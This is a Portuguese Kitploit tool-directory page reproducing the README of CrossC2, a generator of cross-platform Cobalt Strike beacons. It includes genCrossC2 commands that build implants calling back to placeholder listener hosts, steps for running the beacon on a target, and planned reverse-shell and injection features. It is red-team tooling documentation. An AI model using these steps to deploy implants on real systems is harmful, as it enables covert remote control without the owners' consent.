Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CrossC2 — gerar payload multiplataforma do CobaltStrike | Kitploit
Ferramentas/GitHubGitHub/gloxec/crossc2
Frameworks de Testes de PenetraçãoFrameworks de ExploraçãoGeração de PayloadsPós-ExploraçãoComando e ControleRed TeamingDesenvolvimento de Payloads
GitHubgloxec/crossc2

CrossC2

gerar payload multiplataforma do CobaltStrike

Ver Repositório
2.6k374há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Framework CrossC2

Linux macOS GitHub issues-closed Release Downloads

Logotipo do CrossC2

LEIA-ME | Documento em Chinês | README_FULL | Documento Completo em Chinês

Suporte ao CobaltStrike

Suporte para avaliação de segurança do CobaltStrike em outras plataformas (Linux/MacOS/...), e inclui suporte ao desenvolvimento do módulo de pós-penetração Unix

2023-07-31 16.56.51

Uso

  1. Download

Baixe CrossC2.cna genCrossC2 CrossC2Kit, modifique a configuração de CrossC2.cna

  1. Crie um listener e copie a chave
  • Crie um listener windows/beacon_https/reverse_https
  • Copie .cobaltstrike.beacon_keys do diretório do teamserver para o local
  1. Extensão de funções
  • Adicione CrossC2Kit_Loader.cna, incluindo carregamento de memória e outras funções
  • Na versão cs4.x, a função de gerenciamento de arquivos e lista de processos está ausente, você deve usar este Loader para reiniciar
  1. Gere o beacon

Use a função GUI fornecida pela cli ou cna para gerar o beacon por padrão

genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch>

exemplo:

root@kitploit:~
1. leia BEACON_KEY do caminho atual e gere BEACON do protocolo de tráfego C2Profile padrão
    genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
     
2. especifique o BEACON da biblioteca dinâmica do protocolo personalizado
    genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out

3. especifique o C2Profile que precisa ser analisado automaticamente
    genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out

Configurações mais avançadas podem ser encontradas na documentação: 📄Referência

  1. Execute o beacon
  • Execute o script online de um clique gerado pelo plugin CrossC2 no alvo
  • Após fazer upload do beacon para a máquina alvo para uma operação autorizada
  • Defina o diretório de trabalho para o beacon e execute: export CCPATH=/opt/ && /tmp/c2
  • Especifique temporariamente a biblioteca de protocolo para o beacon e execute: /tmp/c2 /tmp/c2-rebind.so
  • Defina temporariamente a configuração C2 para o beacon: export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2
  • Defina DEBUG para visualizar o status online do beacon: export CCDEBUG=1 && /tmp/c2

CrossC2Kit

CrossC2Kit: https://github.com/CrossC2/CrossC2Kit

CrossC2Kit é uma expansão de infiltração para a plataforma Unix derivada do CrossC2. Use o mecanismo de script de código aberto Aggressor Script. Pode ser usado para criar automação para simular o processo de operação da Red Team e expandir o cliente CobaltStrike.

CrossC2Kit é herdado das funcionalidades originais do CobaltStrike, portanto, a gramática de desenvolvimento e escrita ainda referencia a documentação oficial: https://trial.cobaltstrike.com/aggressor-script/index.html

Mas possui algumas extensões de API sobre o CrossC2 para controlar o beacon da plataforma Unix

API: 📄Referência

Demo: CrossC2_action2

Nota

Apenas para uso interno por empresas e organizações, este framework possui um certo grau de instabilidade. Não profissionais não estão autorizados a usá-lo. Ninguém deve usá-lo para fins ilegais e lucratividade. Além disso, publicar versão modificada não autorizada também é proibido, ou então arcar com responsabilidades legais.

Pendências

  1. suporte a conexão reversa http-proxy (auth) e socks proxy
  2. beacon node? (Tipo de nó único, pode hospedar outro beacon sem depender do teamserver)
  3. suporte a reverse shell de so/dylib no Linux & MacOS, e suas funções derivadas de injeção de processo

Agradecimentos

Agradecimentos a @Emma pelo Logotipo projetado para o CrossC2, que é projetado no estilo das séries Armitage e CobaltStrike.

Baixar ferramenta
CS3.14 (correções de bugs)CS4.0CS4.X (4.1~4.8)
Branch master✅
Branch cs4.0✅
Branch cs4.1✅
Página de Release <= v2.1✅
Página de Release >= v2.2✅